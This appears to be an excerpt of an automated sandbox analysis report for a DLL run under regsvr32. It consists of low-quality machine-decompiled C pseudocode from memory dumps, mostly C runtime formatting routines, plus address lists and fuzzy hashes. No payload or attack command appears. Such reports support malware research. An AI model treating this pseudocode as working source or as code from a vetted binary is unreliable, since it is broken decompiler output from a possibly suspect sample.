                                                                                                                                            				_t161 =  &_v64;
                                                                                                                                            				_v136 = _t161;
                                                                                                                                            				r9d = _a48;
                                                                                                                                            				r8d = _a56;
                                                                                                                                            				E00007FFC7FFC65CFEA30(_a16, _a40);
                                                                                                                                            				_v72 = _t161;
                                                                                                                                            				_v64 = _v64 + 1;
                                                                                                                                            				_v72 = _v72 + 0x14;
                                                                                                                                            				if (_v64 - _v60 >= 0) goto 0x65d04cc6;
                                                                                                                                            				if (_a48 -  *_v72 < 0) goto 0x65d04c2b;
                                                                                                                                            				_t165 = _v72;
                                                                                                                                            				if (_a48 -  *((intOrPtr*)(_t165 + 4)) > 0) goto 0x65d04c2b;
                                                                                                                                            				_t117 = E00007FFC7FFC65CFE680( *((intOrPtr*)(_t165 + 4)), _t165);
                                                                                                                                            				_t166 = _t165 +  *((intOrPtr*)(_v72 + 0x10));
                                                                                                                                            				if ( *((intOrPtr*)(_t166 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0x65d04b53;
                                                                                                                                            				_t118 = E00007FFC7FFC65CFE680(_t117, _t166);
                                                                                                                                            				_v48 = _t166;
                                                                                                                                            				_t119 = E00007FFC7FFC65CFE680(_t118, _t166);
                                                                                                                                            				_t169 = _v48 +  *((intOrPtr*)(_t166 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
                                                                                                                                            				_v40 = _t169;
                                                                                                                                            				goto 0x65d04b5f;
                                                                                                                                            				_v40 = 0;
                                                                                                                                            				if (_v40 == 0) goto 0x65d04bff;
                                                                                                                                            				_t120 = E00007FFC7FFC65CFE680(_t119, _t169);
                                                                                                                                            				_t170 = _t169 +  *((intOrPtr*)(_v72 + 0x10));
                                                                                                                                            				if ( *((intOrPtr*)(_t170 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0x65d04be3;
                                                                                                                                            				_t121 = E00007FFC7FFC65CFE680(_t120, _t170);
                                                                                                                                            				_v32 = _t170;
                                                                                                                                            				E00007FFC7FFC65CFE680(_t121, _t170);
                                                                                                                                            				_v24 = _v32 +  *((intOrPtr*)(_t170 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
                                                                                                                                            				goto 0x65d04bef;
                                                                                                                                            				_v24 = 0;
                                                                                                                                            				_t174 = _v24;
                                                                                                                                            				if ( *((char*)(_t174 + 0x10)) != 0) goto 0x65d04c2b;
                                                                                                                                            				E00007FFC7FFC65CFE680( *((char*)(_t174 + 0x10)), _t174);
                                                                                                                                            				if (( *(_t174 +  *((intOrPtr*)(_v72 + 0x10)) + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14) & 0x00000040) == 0) goto 0x65d04c30;
                                                                                                                                            				goto L1;
                                                                                                                                            				__eax = E00007FFC7FFC65CFE680(__eax, __rax);
                                                                                                                                            				_v72 =  *((intOrPtr*)(_v72 + 0x10));
                                                                                                                                            				__rax = __rax +  *((intOrPtr*)(_v72 + 0x10));
                                                                                                                                            				_v72 =  *((intOrPtr*)(_v72 + 0xc)) - 1;
                                                                                                                                            				__rcx = ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
                                                                                                                                            				__rax = __rax + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
                                                                                                                                            				__eflags = __rax;
                                                                                                                                            				_v80 = 0;
                                                                                                                                            				_v88 = 1;
                                                                                                                                            				__rcx = _a64;
                                                                                                                                            				_v96 = _a64;
                                                                                                                                            				_v104 = _a56;
                                                                                                                                            				__rcx = _v72;
                                                                                                                                            				_v112 = _v72;
                                                                                                                                            				_v120 = 0;
                                                                                                                                            				_v128 = __rax;
                                                                                                                                            				__rax = _a40;
                                                                                                                                            				_v136 = _a40;
                                                                                                                                            				__r9 = _a32;
                                                                                                                                            				__r8 = _a24;
                                                                                                                                            				__rdx = _a16;
                                                                                                                                            				__rcx = _a8;
                                                                                                                                            				__eax = E00007FFC7FFC65D05180(__edi, __esi, __esp, __eflags, _a8, _a16, _a24, _a32);
                                                                                                                                            				goto L1;
                                                                                                                                            				return __eax;
                                                                                                                                            			}
































                                                                                                                                            0x7ffc65d04960
                                                                                                                                            0x7ffc65d04965
                                                                                                                                            0x7ffc65d0496a
                                                                                                                                            0x7ffc65d0496f
                                                                                                                                            0x7ffc65d0497b
                                                                                                                                            0x7ffc65d04989
                                                                                                                                            0x7ffc65d0498b
                                                                                                                                            0x7ffc65d04990
                                                                                                                                            0x7ffc65d0499d
                                                                                                                                            0x7ffc65d049a3
                                                                                                                                            0x7ffc65d049a8
                                                                                                                                            0x7ffc65d049ad
                                                                                                                                            0x7ffc65d049be
                                                                                                                                            0x7ffc65d049ce
                                                                                                                                            0x7ffc65d049de
                                                                                                                                            0x7ffc65d049e8
                                                                                                                                            0x7ffc65d049f4
                                                                                                                                            0x7ffc65d04a00
                                                                                                                                            0x7ffc65d04a2c
                                                                                                                                            0x7ffc65d04a2e
                                                                                                                                            0x7ffc65d04a3f
                                                                                                                                            0x7ffc65d04a41
                                                                                                                                            0x7ffc65d04a43
                                                                                                                                            0x7ffc65d04a50
                                                                                                                                            0x7ffc65d04a5a
                                                                                                                                            0x7ffc65d04a5f
                                                                                                                                            0x7ffc65d04a64
                                                                                                                                            0x7ffc65d04a69
                                                                                                                                            0x7ffc65d04a71
                                                                                                                                            0x7ffc65d04a89
                                                                                                                                            0x7ffc65d04a8e
                                                                                                                                            0x7ffc65d04a9b
                                                                                                                                            0x7ffc65d04aa8
                                                                                                                                            0x7ffc65d04ab5
                                                                                                                                            0x7ffc65d04ac9
                                                                                                                                            0x7ffc65d04acf
                                                                                                                                            0x7ffc65d04ade
                                                                                                                                            0x7ffc65d04ae4
                                                                                                                                            0x7ffc65d04af2
                                                                                                                                            0x7ffc65d04b0b
                                                                                                                                            0x7ffc65d04b0d
                                                                                                                                            0x7ffc65d04b12
                                                                                                                                            0x7ffc65d04b17
                                                                                                                                            0x7ffc65d04b46
                                                                                                                                            0x7ffc65d04b49
                                                                                                                                            0x7ffc65d04b51
                                                                                                                                            0x7ffc65d04b53
                                                                                                                                            0x7ffc65d04b68
                                                                                                                                            0x7ffc65d04b6e
                                                                                                                                            0x7ffc65d04b7c
                                                                                                                                            0x7ffc65d04b95
                                                                                                                                            0x7ffc65d04b97
                                                                                                                                            0x7ffc65d04b9c
                                                                                                                                            0x7ffc65d04ba4
                                                                                                                                            0x7ffc65d04bd9
                                                                                                                                            0x7ffc65d04be1
                                                                                                                                            0x7ffc65d04be3
                                                                                                                                            0x7ffc65d04bef
                                                                                                                                            0x7ffc65d04bfd
                                                                                                                                            0x7ffc65d04bff
                                                                                                                                            0x7ffc65d04c29
                                                                                                                                            0x7ffc65d04c2b
                                                                                                                                            0x7ffc65d04c30
                                                                                                                                            0x7ffc65d04c3a
                                                                                                                                            0x7ffc65d04c3e
                                                                                                                                            0x7ffc65d04c4b
                                                                                                                                            0x7ffc65d04c4e
                                                                                                                                            0x7ffc65d04c52
                                                                                                                                            0x7ffc65d04c52
                                                                                                                                            0x7ffc65d04c55
                                                                                                                                            0x7ffc65d04c5a
                                                                                                                                            0x7ffc65d04c5f
                                                                                                                                            0x7ffc65d04c67
                                                                                                                                            0x7ffc65d04c73
                                                                                                                                            0x7ffc65d04c77
                                                                                                                                            0x7ffc65d04c7c
                                                                                                                                            0x7ffc65d04c81
                                                                                                                                            0x7ffc65d04c8a
                                                                                                                                            0x7ffc65d04c8f
                                                                                                                                            0x7ffc65d04c97
                                                                                                                                            0x7ffc65d04c9c
                                                                                                                                            0x7ffc65d04ca4
                                                                                                                                            0x7ffc65d04cac
                                                                                                                                            0x7ffc65d04cb4
                                                                                                                                            0x7ffc65d04cbc
                                                                                                                                            0x7ffc65d04cc1
                                                                                                                                            0x7ffc65d04ccd

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                            • API String ID: 0-2084237596
                                                                                                                                            • Opcode ID: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
                                                                                                                                            • Instruction ID: 6dfb873236f965b6617ea11b727e57aab2d33998713db54c0daf634f8f88a1db
                                                                                                                                            • Opcode Fuzzy Hash: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
                                                                                                                                            • Instruction Fuzzy Hash: 9E91FB3260DB99C6DA64DF45E09076AB3A1FBC8B45F204836EA8E83799CF3CD441CB54
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 19%
                                                                                                                                            			E00007FFC7FFC65D0C6F8(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                                                                                                                            				signed int _t217;
                                                                                                                                            				signed char _t222;
                                                                                                                                            				intOrPtr _t257;
                                                                                                                                            				signed int _t332;
                                                                                                                                            				signed int _t333;
                                                                                                                                            				signed long long _t336;
                                                                                                                                            				intOrPtr* _t359;
                                                                                                                                            				signed long long _t384;
                                                                                                                                            
                                                                                                                                            				_t332 = __rax;
                                                                                                                                            				_a116 = 0x10;
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				_a708 = 7;
                                                                                                                                            				_a708 = 0x27;
                                                                                                                                            				_a72 = 0x10;
                                                                                                                                            				if ((_a80 & 0x00000080) == 0) goto 0x65d0c754;
                                                                                                                                            				_a84 = 0x30;
                                                                                                                                            				_a85 = _a708 + 0x51;
                                                                                                                                            				_a92 = 2;
                                                                                                                                            				_a72 = 8;
                                                                                                                                            				if ((_a80 & 0x00000080) == 0) goto 0x65d0c777;
                                                                                                                                            				asm("bts eax, 0x9");
                                                                                                                                            				if ((_a80 & 0x00008000) == 0) goto 0x65d0c79e;
                                                                                                                                            				E00007FFC7FFC65D01EA0( &_a1112);
                                                                                                                                            				_a824 = _t332;
                                                                                                                                            				goto 0x65d0c84b;
                                                                                                                                            				if ((_a80 & 0x00001000) == 0) goto 0x65d0c7c5;
                                                                                                                                            				E00007FFC7FFC65D01EA0( &_a1112);
                                                                                                                                            				_a824 = _t332;
                                                                                                                                            				goto 0x65d0c84b;
                                                                                                                                            				if ((_a80 & 0x00000020) == 0) goto 0x65d0c810;
                                                                                                                                            				if ((_a80 & 0x00000040) == 0) goto 0x65d0c7f6;
                                                                                                                                            				_t333 = E00007FFC7FFC65D01E40( &_a1112);
                                                                                                                                            				_a824 = _t333;
                                                                                                                                            				goto 0x65d0c80e;
                                                                                                                                            				E00007FFC7FFC65D01E40( &_a1112);
                                                                                                                                            				_a824 = _t333;
                                                                                                                                            				goto 0x65d0c84b;
                                                                                                                                            				if ((_a80 & 0x00000040) == 0) goto 0x65d0c834;
                                                                                                                                            				E00007FFC7FFC65D01E40( &_a1112);
                                                                                                                                            				_a824 = _t333;
                                                                                                                                            				goto 0x65d0c84b;
                                                                                                                                            				E00007FFC7FFC65D01E40( &_a1112);
                                                                                                                                            				_a824 = _t333;
                                                                                                                                            				if ((_a80 & 0x00000040) == 0) goto 0x65d0c882;
                                                                                                                                            				if (_a824 >= 0) goto 0x65d0c882;
                                                                                                                                            				_a832 =  ~_a824;
                                                                                                                                            				asm("bts eax, 0x8");
                                                                                                                                            				goto 0x65d0c892;
                                                                                                                                            				_t336 = _a824;
                                                                                                                                            				_a832 = _t336;
                                                                                                                                            				if ((_a80 & 0x00008000) != 0) goto 0x65d0c8c7;
                                                                                                                                            				if ((_a80 & 0x00001000) != 0) goto 0x65d0c8c7;
                                                                                                                                            				_a832 = _a832 & _t336;
                                                                                                                                            				if (_a116 >= 0) goto 0x65d0c8d8;
                                                                                                                                            				_a116 = 1;
                                                                                                                                            				goto 0x65d0c8f5;
                                                                                                                                            				_a80 = _a80 & 0xfffffff7;
                                                                                                                                            				if (_a116 - 0x200 <= 0) goto 0x65d0c8f5;
                                                                                                                                            				_a116 = 0x200;
                                                                                                                                            				if (_a832 != 0) goto 0x65d0c908;
                                                                                                                                            				_a92 = 0;
                                                                                                                                            				_a64 =  &_a687;
                                                                                                                                            				_t217 = _a116;
                                                                                                                                            				_a116 = _a116 - 1;
                                                                                                                                            				if (_t217 > 0) goto 0x65d0c936;
                                                                                                                                            				if (_a832 == 0) goto 0x65d0c9d3;
                                                                                                                                            				_a1040 = _a72;
                                                                                                                                            				_a816 = _t217 / _a1040 + 0x30;
                                                                                                                                            				_a1048 = _a72;
                                                                                                                                            				if (_a816 - 0x39 <= 0) goto 0x65d0c9b2;
                                                                                                                                            				_t222 = _a816 + _a708;
                                                                                                                                            				_a816 = _t222;
                                                                                                                                            				 *_a64 = _a816 & 0x000000ff;
                                                                                                                                            				_a64 = _a64 - 1;
                                                                                                                                            				goto 0x65d0c915;
                                                                                                                                            				_a104 = _t222;
                                                                                                                                            				_a64 = _a64 + 1;
                                                                                                                                            				if ((_a80 & 0x00000200) == 0) goto 0x65d0ca31;
                                                                                                                                            				if (_a104 == 0) goto 0x65d0ca12;
                                                                                                                                            				if ( *_a64 == 0x30) goto 0x65d0ca31;
                                                                                                                                            				_a64 = _a64 - 1;
                                                                                                                                            				 *_a64 = 0x30;
                                                                                                                                            				_a104 = _a104 + 1;
                                                                                                                                            				if (_a108 != 0) goto 0x65d0cc6e;
                                                                                                                                            				if ((_a80 & 0x00000040) == 0) goto 0x65d0ca95;
                                                                                                                                            				if ((_a80 & 0x00000100) == 0) goto 0x65d0ca63;
                                                                                                                                            				_a84 = 0x2d;
                                                                                                                                            				_a92 = 1;
                                                                                                                                            				goto 0x65d0ca95;
                                                                                                                                            				if ((_a80 & 0x00000001) == 0) goto 0x65d0ca7d;
                                                                                                                                            				_a84 = 0x2b;
                                                                                                                                            				_a92 = 1;
                                                                                                                                            				goto 0x65d0ca95;
                                                                                                                                            				if ((_a80 & 0x00000002) == 0) goto 0x65d0ca95;
                                                                                                                                            				_a84 = 0x20;
                                                                                                                                            				_a92 = 1;
                                                                                                                                            				_a840 = _a88 - _a104 - _a92;
                                                                                                                                            				if ((_a80 & 0x0000000c) != 0) goto 0x65d0cad5;
                                                                                                                                            				E00007FFC7FFC65D0CF10(0x20, _a840, _a1088,  &_a688);
                                                                                                                                            				E00007FFC7FFC65D0CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                                                                                                                            				if ((_a80 & 0x00000008) == 0) goto 0x65d0cb27;
                                                                                                                                            				if ((_a80 & 0x00000004) != 0) goto 0x65d0cb27;
                                                                                                                                            				E00007FFC7FFC65D0CF10(0x30, _a840, _a1088,  &_a688);
                                                                                                                                            				if (_a76 == 0) goto 0x65d0cc1d;
                                                                                                                                            				if (_a104 <= 0) goto 0x65d0cc1d;
                                                                                                                                            				_a872 = 0;
                                                                                                                                            				_a848 = _a64;
                                                                                                                                            				_a856 = _a104;
                                                                                                                                            				_a856 = _a856 - 1;
                                                                                                                                            				if (_a856 == 0) goto 0x65d0cc1b;
                                                                                                                                            				_a1056 =  *_a848 & 0x0000ffff;
                                                                                                                                            				r9d = _a1056 & 0x0000ffff;
                                                                                                                                            				r8d = 6;
                                                                                                                                            				_a872 = E00007FFC7FFC65D0B530( &_a860,  &_a864, _a1088);
                                                                                                                                            				_a848 =  &(_a848[1]);
                                                                                                                                            				if (_a872 != 0) goto 0x65d0cbe5;
                                                                                                                                            				if (_a860 != 0) goto 0x65d0cbf2;
                                                                                                                                            				_a688 = 0xffffffff;
                                                                                                                                            				goto 0x65d0cc1b;
                                                                                                                                            				E00007FFC7FFC65D0CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                                                                                                                            				goto 0x65d0cb60;
                                                                                                                                            				goto 0x65d0cc3b;
                                                                                                                                            				E00007FFC7FFC65D0CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                                                                                                                            				if (_a688 < 0) goto 0x65d0cc6e;
                                                                                                                                            				if ((_a80 & 0x00000004) == 0) goto 0x65d0cc6e;
                                                                                                                                            				E00007FFC7FFC65D0CF10(0x20, _a840, _a1088,  &_a688);
                                                                                                                                            				if (_a96 == 0) goto 0x65d0cc8e;
                                                                                                                                            				0x65cf5330();
                                                                                                                                            				_a96 = 0;
                                                                                                                                            				goto 0x65d0b99c;
                                                                                                                                            				if (_a704 == 0) goto 0x65d0ccb4;
                                                                                                                                            				if (_a704 == 7) goto 0x65d0ccb4;
                                                                                                                                            				_a1060 = 0;
                                                                                                                                            				goto 0x65d0ccbf;
                                                                                                                                            				_a1060 = 1;
                                                                                                                                            				_t257 = _a1060;
                                                                                                                                            				_a876 = _t257;
                                                                                                                                            				if (_a876 != 0) goto 0x65d0cd05;
                                                                                                                                            				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                                                                                                            				_a32 = _t359;
                                                                                                                                            				r9d = 0;
                                                                                                                                            				r8d = 0x8f5;
                                                                                                                                            				0x65cfb3b0();
                                                                                                                                            				if (_t257 != 1) goto 0x65d0cd05;
                                                                                                                                            				asm("int3");
                                                                                                                                            				if (_a876 != 0) goto 0x65d0cd61;
                                                                                                                                            				0x65cfab30();
                                                                                                                                            				 *_t359 = 0x16;
                                                                                                                                            				_a32 = 0;
                                                                                                                                            				r9d = 0x8f5;
                                                                                                                                            				E00007FFC7FFC65CFBD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                                                                            				_a912 = 0xffffffff;
                                                                                                                                            				E00007FFC7FFC65CF6800( &_a120);
                                                                                                                                            				goto 0x65d0cd80;
                                                                                                                                            				_a916 = _a688;
                                                                                                                                            				E00007FFC7FFC65CF6800( &_a120);
                                                                                                                                            				return E00007FFC7FFC65CF3280(_a916, 2, 2, _a1064 ^ _t384, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                                                                            			}











                                                                                                                                            0x7ffc65d0c6f8
                                                                                                                                            0x7ffc65d0c6f8
                                                                                                                                            0x7ffc65d0c704
                                                                                                                                            0x7ffc65d0c70c
                                                                                                                                            0x7ffc65d0c719
                                                                                                                                            0x7ffc65d0c724
                                                                                                                                            0x7ffc65d0c737
                                                                                                                                            0x7ffc65d0c739
                                                                                                                                            0x7ffc65d0c748
                                                                                                                                            0x7ffc65d0c74c
                                                                                                                                            0x7ffc65d0c756
                                                                                                                                            0x7ffc65d0c769
                                                                                                                                            0x7ffc65d0c76f
                                                                                                                                            0x7ffc65d0c782
                                                                                                                                            0x7ffc65d0c78c
                                                                                                                                            0x7ffc65d0c791
                                                                                                                                            0x7ffc65d0c799
                                                                                                                                            0x7ffc65d0c7a9
                                                                                                                                            0x7ffc65d0c7b3
                                                                                                                                            0x7ffc65d0c7b8
                                                                                                                                            0x7ffc65d0c7c0
                                                                                                                                            0x7ffc65d0c7ce
                                                                                                                                            0x7ffc65d0c7d9
                                                                                                                                            0x7ffc65d0c7e8
                                                                                                                                            0x7ffc65d0c7ec
                                                                                                                                            0x7ffc65d0c7f4
                                                                                                                                            0x7ffc65d0c7fe
                                                                                                                                            0x7ffc65d0c806
                                                                                                                                            0x7ffc65d0c80e
                                                                                                                                            0x7ffc65d0c819
                                                                                                                                            0x7ffc65d0c823
                                                                                                                                            0x7ffc65d0c82a
                                                                                                                                            0x7ffc65d0c832
                                                                                                                                            0x7ffc65d0c83c
                                                                                                                                            0x7ffc65d0c843
                                                                                                                                            0x7ffc65d0c854
                                                                                                                                            0x7ffc65d0c85f
                                                                                                                                            0x7ffc65d0c86c
                                                                                                                                            0x7ffc65d0c878
                                                                                                                                            0x7ffc65d0c880
                                                                                                                                            0x7ffc65d0c882
                                                                                                                                            0x7ffc65d0c88a
                                                                                                                                            0x7ffc65d0c89d
                                                                                                                                            0x7ffc65d0c8aa
                                                                                                                                            0x7ffc65d0c8bf
                                                                                                                                            0x7ffc65d0c8cc
                                                                                                                                            0x7ffc65d0c8ce
                                                                                                                                            0x7ffc65d0c8d6
                                                                                                                                            0x7ffc65d0c8df
                                                                                                                                            0x7ffc65d0c8eb
                                                                                                                                            0x7ffc65d0c8ed
                                                                                                                                            0x7ffc65d0c8fe
                                                                                                                                            0x7ffc65d0c900
                                                                                                                                            0x7ffc65d0c910
                                                                                                                                            0x7ffc65d0c915
                                                                                                                                            0x7ffc65d0c91f
                                                                                                                                            0x7ffc65d0c925
                                                                                                                                            0x7ffc65d0c930
                                                                                                                                            0x7ffc65d0c93b
                                                                                                                                            0x7ffc65d0c95e
                                                                                                                                            0x7ffc65d0c96a
                                                                                                                                            0x7ffc65d0c997
                                                                                                                                            0x7ffc65d0c9a9
                                                                                                                                            0x7ffc65d0c9ab
                                                                                                                                            0x7ffc65d0c9bf
                                                                                                                                            0x7ffc65d0c9c9
                                                                                                                                            0x7ffc65d0c9ce
                                                                                                                                            0x7ffc65d0c9e0
                                                                                                                                            0x7ffc65d0c9ec
                                                                                                                                            0x7ffc65d0c9fc
                                                                                                                                            0x7ffc65d0ca03
                                                                                                                                            0x7ffc65d0ca10
                                                                                                                                            0x7ffc65d0ca1a
                                                                                                                                            0x7ffc65d0ca24
                                                                                                                                            0x7ffc65d0ca2d
                                                                                                                                            0x7ffc65d0ca36
                                                                                                                                            0x7ffc65d0ca45
                                                                                                                                            0x7ffc65d0ca52
                                                                                                                                            0x7ffc65d0ca54
                                                                                                                                            0x7ffc65d0ca59
                                                                                                                                            0x7ffc65d0ca61
                                                                                                                                            0x7ffc65d0ca6c
                                                                                                                                            0x7ffc65d0ca6e
                                                                                                                                            0x7ffc65d0ca73
                                                                                                                                            0x7ffc65d0ca7b
                                                                                                                                            0x7ffc65d0ca86
                                                                                                                                            0x7ffc65d0ca88
                                                                                                                                            0x7ffc65d0ca8d
                                                                                                                                            0x7ffc65d0caa5
                                                                                                                                            0x7ffc65d0cab5
                                                                                                                                            0x7ffc65d0cad0
                                                                                                                                            0x7ffc65d0caee
                                                                                                                                            0x7ffc65d0cafc
                                                                                                                                            0x7ffc65d0cb07
                                                                                                                                            0x7ffc65d0cb22
                                                                                                                                            0x7ffc65d0cb2c
                                                                                                                                            0x7ffc65d0cb37
                                                                                                                                            0x7ffc65d0cb3d
                                                                                                                                            0x7ffc65d0cb4d
                                                                                                                                            0x7ffc65d0cb59
                                                                                                                                            0x7ffc65d0cb70
                                                                                                                                            0x7ffc65d0cb79
                                                                                                                                            0x7ffc65d0cb8a
                                                                                                                                            0x7ffc65d0cb92
                                                                                                                                            0x7ffc65d0cb9b
                                                                                                                                            0x7ffc65d0cbb6
                                                                                                                                            0x7ffc65d0cbc9
                                                                                                                                            0x7ffc65d0cbd9
                                                                                                                                            0x7ffc65d0cbe3
                                                                                                                                            0x7ffc65d0cbe5
                                                                                                                                            0x7ffc65d0cbf0
                                                                                                                                            0x7ffc65d0cc11
                                                                                                                                            0x7ffc65d0cc16
                                                                                                                                            0x7ffc65d0cc1b
                                                                                                                                            0x7ffc65d0cc36
                                                                                                                                            0x7ffc65d0cc43
                                                                                                                                            0x7ffc65d0cc4e
                                                                                                                                            0x7ffc65d0cc69
                                                                                                                                            0x7ffc65d0cc74
                                                                                                                                            0x7ffc65d0cc80
                                                                                                                                            0x7ffc65d0cc85
                                                                                                                                            0x7ffc65d0cc8e
                                                                                                                                            0x7ffc65d0cc9b
                                                                                                                                            0x7ffc65d0cca5
                                                                                                                                            0x7ffc65d0cca7
                                                                                                                                            0x7ffc65d0ccb2
                                                                                                                                            0x7ffc65d0ccb4
                                                                                                                                            0x7ffc65d0ccbf
                                                                                                                                            0x7ffc65d0ccc6
                                                                                                                                            0x7ffc65d0ccd5
                                                                                                                                            0x7ffc65d0ccd7
                                                                                                                                            0x7ffc65d0ccde
                                                                                                                                            0x7ffc65d0cce3
                                                                                                                                            0x7ffc65d0cce6
                                                                                                                                            0x7ffc65d0ccf8
                                                                                                                                            0x7ffc65d0cd00
                                                                                                                                            0x7ffc65d0cd02
                                                                                                                                            0x7ffc65d0cd0d
                                                                                                                                            0x7ffc65d0cd0f
                                                                                                                                            0x7ffc65d0cd14
                                                                                                                                            0x7ffc65d0cd1a
                                                                                                                                            0x7ffc65d0cd23
                                                                                                                                            0x7ffc65d0cd3e
                                                                                                                                            0x7ffc65d0cd43
                                                                                                                                            0x7ffc65d0cd53
                                                                                                                                            0x7ffc65d0cd5f
                                                                                                                                            0x7ffc65d0cd68
                                                                                                                                            0x7ffc65d0cd74
                                                                                                                                            0x7ffc65d0cd97

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: get_int64_arg
                                                                                                                                            • String ID: 0$9
                                                                                                                                            • API String ID: 1967237116-1975997740
                                                                                                                                            • Opcode ID: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                                                                                                                            • Instruction ID: 44518fbf1b0615016b50cc723efa3f4d230cd875f613aafa3496d2f3d654c172
                                                                                                                                            • Opcode Fuzzy Hash: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                                                                                                                            • Instruction Fuzzy Hash: 5941E33260DAC5CBE7798B19E5813AAF7A4F784B50F200525E78C86A98DBBCD540CF20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 23%
                                                                                                                                            			E00007FFC7FFC65D0E70C(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
                                                                                                                                            				signed int _t213;
                                                                                                                                            				signed char _t218;
                                                                                                                                            				void* _t249;
                                                                                                                                            				intOrPtr _t257;
                                                                                                                                            				signed int _t331;
                                                                                                                                            				signed int _t332;
                                                                                                                                            				signed long long _t335;
                                                                                                                                            				intOrPtr* _t354;
                                                                                                                                            				intOrPtr* _t359;
                                                                                                                                            				signed long long _t389;
                                                                                                                                            
                                                                                                                                            				_t331 = __rax;
                                                                                                                                            				_a1220 = 0x27;
                                                                                                                                            				_a72 = 0x10;
                                                                                                                                            				if ((_a80 & 0x00000080) == 0) goto 0x65d0e74d;
                                                                                                                                            				_a84 = 0x30;
                                                                                                                                            				_a86 = _a1220 + 0x51;
                                                                                                                                            				_a92 = 2;
                                                                                                                                            				_a72 = 8;
                                                                                                                                            				if ((_a80 & 0x00000080) == 0) goto 0x65d0e770;
                                                                                                                                            				asm("bts eax, 0x9");
                                                                                                                                            				if ((_a80 & 0x00008000) == 0) goto 0x65d0e797;
                                                                                                                                            				E00007FFC7FFC65D01EA0( &_a1560);
                                                                                                                                            				_a1304 = _t331;
                                                                                                                                            				goto 0x65d0e844;
                                                                                                                                            				if ((_a80 & 0x00001000) == 0) goto 0x65d0e7be;
                                                                                                                                            				E00007FFC7FFC65D01EA0( &_a1560);
                                                                                                                                            				_a1304 = _t331;
                                                                                                                                            				goto 0x65d0e844;
                                                                                                                                            				if ((_a80 & 0x00000020) == 0) goto 0x65d0e809;
